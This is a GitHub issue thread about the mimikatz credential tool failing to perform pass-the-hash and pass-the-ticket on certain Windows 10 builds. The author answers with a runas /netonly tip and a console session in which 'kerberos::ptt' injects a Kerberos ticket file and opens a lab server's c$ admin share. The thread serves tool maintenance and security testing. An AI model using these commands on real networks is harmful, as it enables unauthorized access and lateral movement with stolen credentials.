### ISSUE TITLE
PTT and PTH Issue with Win10

### ISSUE THREAD

**Issue by goldfinger2** [gentilkiwi/mimikatz#46]
Salut Benjamin,

we tried the newest  builds of mimikatz 2.1 alpha 20160602 /  20160525

Windows 10 Build 10240 RTM:               PTH ok; PTT **not** working
Windows 10 Build 10586 Version 1511: PTH **not** working; PTT **not** working
Windows 7 SP1                                       PTH ok; PTT ok

The output of mimikatz claims that everthing went "ok" in all six cases.

Greetings, 

goldfinger2

**Comment by gentilkiwi** [comment]
Hi :)

Thank your for the report.
Pass-the-ticket works well (10240/10586), it relies on standard Windows API (no hack). But you can consider it does not work when using it in your current session (previous tickets, previous openned connections to servers.... already authenticated) : a "runas /noprofile /netonly fake@fake.fake cmd" can help you to start in a clear session without logoff/other computer ;)

```
Microsoft Windows [version 10.0.10240]
(c) 2015 Microsoft Corporation. Tous droits réservés.

C:\Users\Gentil Kiwi>cd Desktop

C:\Users\Gentil Kiwi\Desktop>dir \\srvcharly.nirvana.local\c$
Le nom d’utilisateur ou le mot de passe est incorrect.

C:\Users\Gentil Kiwi\Desktop>mimikatz "kerberos::ptt ." exit

  .#####.   mimikatz 2.1 (x64) built on Jun  3 2016 21:39:11
 .## ^ ##.  "A La Vie, A L'Amour"
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                     with 19 modules * * */

mimikatz(commandline) # kerberos::ptt .
* Directory: '.'

* File: '.\2-40a50000-gentilkiwi@cifs~srvcharly.nirvana.local-NIRVANA.LOCAL.kirbi': OK

mimikatz(commandline) # exit
Bye!

C:\Users\Gentil Kiwi\Desktop>dir \\srvcharly.nirvana.local\c$
 Le volume dans le lecteur \\srvcharly.nirvana.local\c$ n’a pas de nom.
 Le numéro de série du volume est 561A-E004

 Répertoire de \\srvcharly.nirvana.local\c$

22/08/2013  17:52    <DIR>          PerfLogs
28/05/2016  12:06    <DIR>          Program Files
29/03/2015  14:27    <DIR>          Program Files (x86)
01/08/2015  12:53    <DIR>          temp
14/09/2015  02:14    <DIR>          Users
13/04/2016  03:33    <DIR>          Windows
               0 fichier(s)                0 octets
               6 Rép(s)  72 379 478 016 octets libres

C:\Users\Gentil Kiwi\Desktop>
```

For Pass-the-hash in 10586, right ! I didn't backport LSAIso structure alignment of #39 to standard MSV.
I'll try to push it tonight with another function I do.
